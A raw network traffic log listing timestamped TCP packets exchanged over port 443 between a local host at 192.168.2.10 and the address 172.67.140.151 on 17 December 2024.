                                                                                    Dec 17, 2024 08:38:44.002099037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.002291918 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.008572102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.008590937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.008697033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.008708000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.008821011 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.015543938 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.015568972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.015685081 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.015695095 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.015896082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.023058891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.023077965 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.023183107 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.023192883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.023233891 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.030442953 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.030462027 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.030570030 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.030580997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.030622005 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.173686028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.173717022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.173827887 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.173827887 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.173844099 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.173952103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.179367065 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.179389000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.179516077 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.179523945 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.179589033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.186965942 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.186983109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.187055111 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.187062979 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.187161922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.194611073 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.194628954 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.194842100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.194850922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.195573092 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.201025009 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.201040983 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.201163054 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.201169968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.201261044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.208714008 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.208729982 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.208791018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.208808899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.208833933 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.208911896 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.215243101 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.215260029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.215332031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.215343952 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.215543032 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.222678900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.222696066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.222793102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.222805977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.222824097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.222898006 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.365377903 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.365403891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.365509033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.365509033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.365519047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.365678072 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.371541977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.371562958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.371629953 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.371645927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.371687889 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.371730089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.379085064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.379103899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.379281998 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.379308939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.379628897 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.385607004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.385627031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.385902882 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.385921001 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.387332916 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.392982960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.393001080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.393091917 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.393105030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.393395901 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.400033951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.400051117 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.400183916 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.400192976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.403728008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.407684088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.407702923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.407805920 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.407818079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.408090115 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.414993048 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.415009022 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.415074110 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.415096998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.415288925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.557379007 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.557406902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.557532072 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.557558060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.557740927 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.563230038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.563247919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.563302040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.563325882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.563343048 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.563404083 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.570751905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.570770025 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.570867062 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.570877075 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.571131945 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.578133106 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.578150034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.578243017 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.578255892 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.581912041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.584654093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.584670067 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.584758997 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.584769011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.584878922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.592638969 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.592658997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.592708111 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.592725039 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.592761040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.592777967 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.599163055 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.599180937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.599253893 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.599263906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.599868059 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.606607914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.606625080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.606719971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.606719971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.606731892 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.610198021 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.749377966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.749407053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.749551058 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.749564886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.749691010 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.755307913 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.755336046 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.755431890 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.755431890 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.755441904 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.755548000 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.762772083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.762795925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.762890100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.762898922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.762952089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.763061047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.770412922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.770433903 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.770494938 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.770503044 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.770529032 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.770684958 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.777668953 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.777688980 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.777734041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.777751923 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.777791977 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.777791977 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.784713030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.784744024 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.784815073 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.784823895 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.784845114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.784909964 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.791214943 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.791234970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.791332006 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.791341066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.791594982 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.798806906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.798826933 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.798882961 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.798901081 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.799012899 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.941330910 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.941366911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.941433907 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.941446066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.941478968 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.941535950 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.947292089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.947329998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.947412014 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.947412014 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.947418928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.947499990 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.954742908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.954767942 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.954859018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.954859018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.954865932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.954963923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.962136030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.962155104 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.962199926 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.962204933 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.962279081 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.969686031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.969707012 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.969753027 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.969758034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.969805956 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.969805956 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.976638079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.976656914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.976741076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.976747036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.977062941 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.984225988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.984246969 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.984343052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.984343052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.984349966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.984442949 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.986398935 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.986488104 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.993868113 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.993885994 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.993941069 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:44.993947029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:44.994033098 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.044034004 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.135755062 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.135770082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.135795116 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.135818958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.135855913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.135869026 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.135921955 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.135921955 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.143163919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.143182039 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.143255949 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.143264055 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.143306017 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.143327951 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.150659084 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.150681973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.150768042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.150777102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.150799036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.150867939 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.157144070 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.157160997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.157335997 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.157351017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.157550097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.164587975 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.164603949 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.164685965 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.164696932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.165290117 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.171669960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.171686888 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.171760082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.171773911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.172003031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.179053068 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.179069042 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.179122925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.179130077 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.179173946 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.179174900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.186610937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.186626911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.186671972 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.186678886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.186739922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.186739922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.328042030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.328063011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.328114986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.328134060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.328145981 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.328248978 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.334497929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.334515095 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.334603071 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.334603071 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.334611893 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.334781885 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.342076063 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.342092037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.342252970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.342264891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.342530966 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.349410057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.349433899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.349503040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.349503040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.349512100 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.349615097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.356914043 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.356929064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.356971979 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.356981039 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.357032061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.357032061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.363873959 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.363892078 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.363949060 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.363959074 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:45.363970041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.364486933 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:45.370445013 CET44349713172.67.140.151192.168.2.10
